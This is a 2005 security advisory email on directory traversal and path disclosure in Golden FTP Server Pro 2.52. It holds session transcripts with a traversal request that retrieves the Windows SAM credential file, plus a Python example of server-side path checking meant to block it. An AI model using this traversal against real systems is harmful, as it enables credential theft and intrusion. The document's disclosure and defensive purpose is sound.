From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 8 May 2005 16:14:23 +0200
Subject: [NT] Golden FTP Server Pro Directory Traversal and Path Disclosure
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050508132738.2C2C157E4@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Golden FTP Server Pro Directory Traversal and Path Disclosure
------------------------------------------------------------------------
SUMMARY
" <http://www.goldenftpserver.com/> Golden FTP Server is extremely easy to
use personal FTP server for Windows and can be run by any person who has
the most basic computer skills."
A vulnerability in Golden FTP Server makes it possible to break out of the
bounding FTP root directory via a directory traversal sequence and access
files stored outside it. Another vulnerability makes it possible to
disclose the true path under which files are stored by requesting a
non-existent file.
DETAILS
Vulnerable Systems:
* Golden FTP Server Pro version 2.52 (other versions suspected)
Directory Traversal:
The Golden FTP server sets a default FTP root directory, for example:
c:\Temp is set as the FTP root directory and is mapped to \Temp. The
directory traversal vulnerability will only manifest itself if you first
change to the name of the directory, i.e. Temp.
Example:
The following traffic sequences illustrate the vulnerability:
C:\>ftp ********
Connected to **********
220 Golden FTP Server PRO ready v2.52
User (********:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> GET "\../winnt/repair/sam
200 PORT Command successful.
150 File status okay; about to open data connection.
226 Closing data connection.
ftp: 24576 bytes received in 1.10Seconds
22.32Kbytes/sec.
ftp> !dir sam
Volume in drive C has no label.
Volume Serial Number is F4A5-2272
Directory of C:\
26/04/2005 11:30 AM 24,576 Sam
1 File(s) 24,576 bytes
0 Dir(s) 30,103,302,656 bytes free
Path Disclosure:
In addition to the above vulnerability, another vulnerability that relies
on the same precondition, i.e. changing your current directory to the name
of the FTP root directory, can be used to disclose the true path under
which the user is currently residing.
Example:
The following illustrates the problem:
ftp>
C:\>ftp ****
Connected to ****
220 Golden FTP Server PRO ready v2.52
User (******:(none)): anonymous
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> cd Temp
250 CWD Command successful.
ftp> get C:\blah
200 PORT Command successful.
550 Cannot open file C:\Temp\C:\blah
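Server-side handling that would reject both requests shown above, as an added Python example; it is not code from Golden FTP Server or from the advisory. FTP_ROOT, resolve, retr_reply and the exists callback are hypothetical names, and the example assumes the virtual root "/" maps to C:\Temp.

```python
import ntpath  # Windows path rules, importable on any OS

FTP_ROOT = "C:\\Temp"  # assumption: real directory behind virtual root "/"

class PathRejected(Exception):
    """The client path would leave FTP_ROOT or uses a forbidden form."""

def resolve(virtual_cwd, arg, root=FTP_ROOT):
    """Return (virtual_path, real_path) for a client path, or raise."""
    arg = arg.strip('"').replace("/", "\\")
    drive, rest = ntpath.splitdrive(arg)
    if drive or ":" in rest or "\0" in rest:
        raise PathRejected("drive letter, UNC prefix, stream or NUL")
    # A leading backslash means the virtual root, never the drive root.
    absolute = rest.startswith("\\")
    parts = [] if absolute else [p for p in virtual_cwd.split("/") if p]
    for comp in rest.split("\\"):
        if comp in ("", "."):
            continue
        if comp == "..":
            if not parts:
                raise PathRejected("'..' above the FTP root")
            parts.pop()
        elif comp != comp.rstrip(". "):
            # Win32 drops trailing dots and spaces, so ".. " could alias "..".
            raise PathRejected("trailing dot or space")
        else:
            parts.append(comp)
    real = ntpath.normpath(ntpath.join(root, *parts))
    # Defence in depth: re-check containment on the final string.
    base = ntpath.normcase(root)
    if ntpath.commonpath([base, ntpath.normcase(real)]) != base:
        raise PathRejected("resolved outside the FTP root")
    return "/" + "/".join(parts), real

def retr_reply(virtual_cwd, arg, exists=lambda real: False):
    """Control-channel reply for RETR; never echoes the real path."""
    try:
        virtual, real = resolve(virtual_cwd, arg)
    except PathRejected:
        return "550 Requested action not taken."
    if not exists(real):  # 'exists' is a hypothetical filesystem probe
        return f"550 {virtual}: No such file."
    return "150 File status okay; about to open data connection."

if __name__ == "__main__":
    # Constructed requests mirroring the two sessions in the advisory.
    for arg in ('"\\../winnt/repair/sam', "C:\\blah", "missing.txt"):
        print(repr(arg), "->", retr_reply("/pub", arg))
```

Error replies carry only the virtual path, so a failed request reveals nothing about where FTP_ROOT lives on disk.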
Disclosure Timeline:
* 02.05.05 - Date vendor notified.
* 03.05.05 - Public Disclosure.
Other vulnerabilities in Golden FTP Server:
<http://www.securiteam.com/windowsntfocus/5AP0L1FEKG.html> Multiple
Buffer Overflows in Golden FTP Server
<http://www.securiteam.com/windowsntfocus/5SP010UF5W.html> Buffer
Overflow In Golden FTP ( Long Username)
<http://www.securiteam.com/exploits/5ZP000AFQI.html> Golden FTP Server
Pro Buffer Overflow (USER, Exploit)
<http://www.securiteam.com/exploits/5AP010AFQG.html> Golden FTP Server
Remote Buffer Overflow (USER, Exploit, 2nd Version)
<http://www.securiteam.com/windowsntfocus/5CP030AFQU.html> Buffer
Overflow in Golden FTP Server (USER, Exploit, Perl)
ADDITIONAL INFORMATION
The information has been provided by <mailto:pseudonym_ok@yahoo.com.>
Lachlan. H.